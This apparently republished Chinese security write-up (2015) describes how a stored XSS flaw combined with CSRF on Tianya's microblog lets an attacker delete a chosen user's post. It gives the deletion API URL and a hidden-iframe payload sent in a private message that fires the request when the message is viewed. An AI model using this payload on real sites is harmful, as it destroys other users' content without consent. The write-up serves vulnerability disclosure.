天涯CSRF系列三: 结合储存型XSS定向删除指定用户-自学php网

主页 > 后端 > 网站安全 >

天涯CSRF系列三: 结合储存型XSS定向删除指定用户

来源：自学PHP网时间：2015-04-17 10:16 作者：阅读:次

[导读] 这次我们来看看如何利用XSS结合CSRF打造定向攻击再来看一下上次（http: www 2cto com Article 201310 248998 html）的文件引发的又一个问题首先抓包拿到删除微博的URLhttp: www tianya cn api tw?method=tw...

这次我们来看看如何利用XSS结合CSRF打造定向攻击

再来看一下上次（http://www.2cto.com/Article/201310/248998.html）的文件引发的又一个问题

首先抓包拿到删除微博的URL

http://www.tianya.cn/api/tw?method=tweet.ice.deleteTweet&params.id=0000000&params.delUserId=0000000

params.id 代表微博的ID

params.delUserId 代表所属帐号的ID

首先拿我自己做测试，我先发表一条微博

然后找到该条微博的ID

找到用户的ID

来到发送消息的页面

构造如下恶意代码:

<iframe style='display:none' src='http://www.tianya.cn/api/tw?method=tweet.ice.deleteTweet&params.id=68541413&params.delUserId=82776194' >

发送之后，我们查看源码

这时 CSRF+XSS 已经攻击成功，回到首页查看，微博已没。

修复方案：

幸苦你们了

天涯CSRF系列二: 劫持用户发送消息给任意用户

天涯CSRF系列四: 利用储存XSS+伪CSRF进行蠕虫攻击

最新评论

加载更多~~

添加评论

更多文章推荐

让千千静听不再弹出广告 - Windows操作系统 - 自学 2015-04-17
世界大学城盲注和显错注入 - 网站安全 - 自学p 2015-04-17
使用动态sql的方法防止sql注入 - 网站安全 - 自学 2015-04-17
Artiphp CMS 5.5.0数据库备份泄露Exploit - 网站安全 2015-04-17
Discuz附件下载权限绕过方法 - 网站安全 - 自学p 2015-04-16
FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION - 网站安全 2015-04-16
麦考林任意妹纸密码重置 - 网站安全 - 自学php 2015-04-17
Bonza Digital Cart脚本注射缺陷及修复 - 网站安全 2015-04-17
一个变态的7验证4语言OA系统 - 网站安全 - 自学 2015-04-17
绝密!为WindowsXP设置一个隐形密码 - Windows操作系统 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论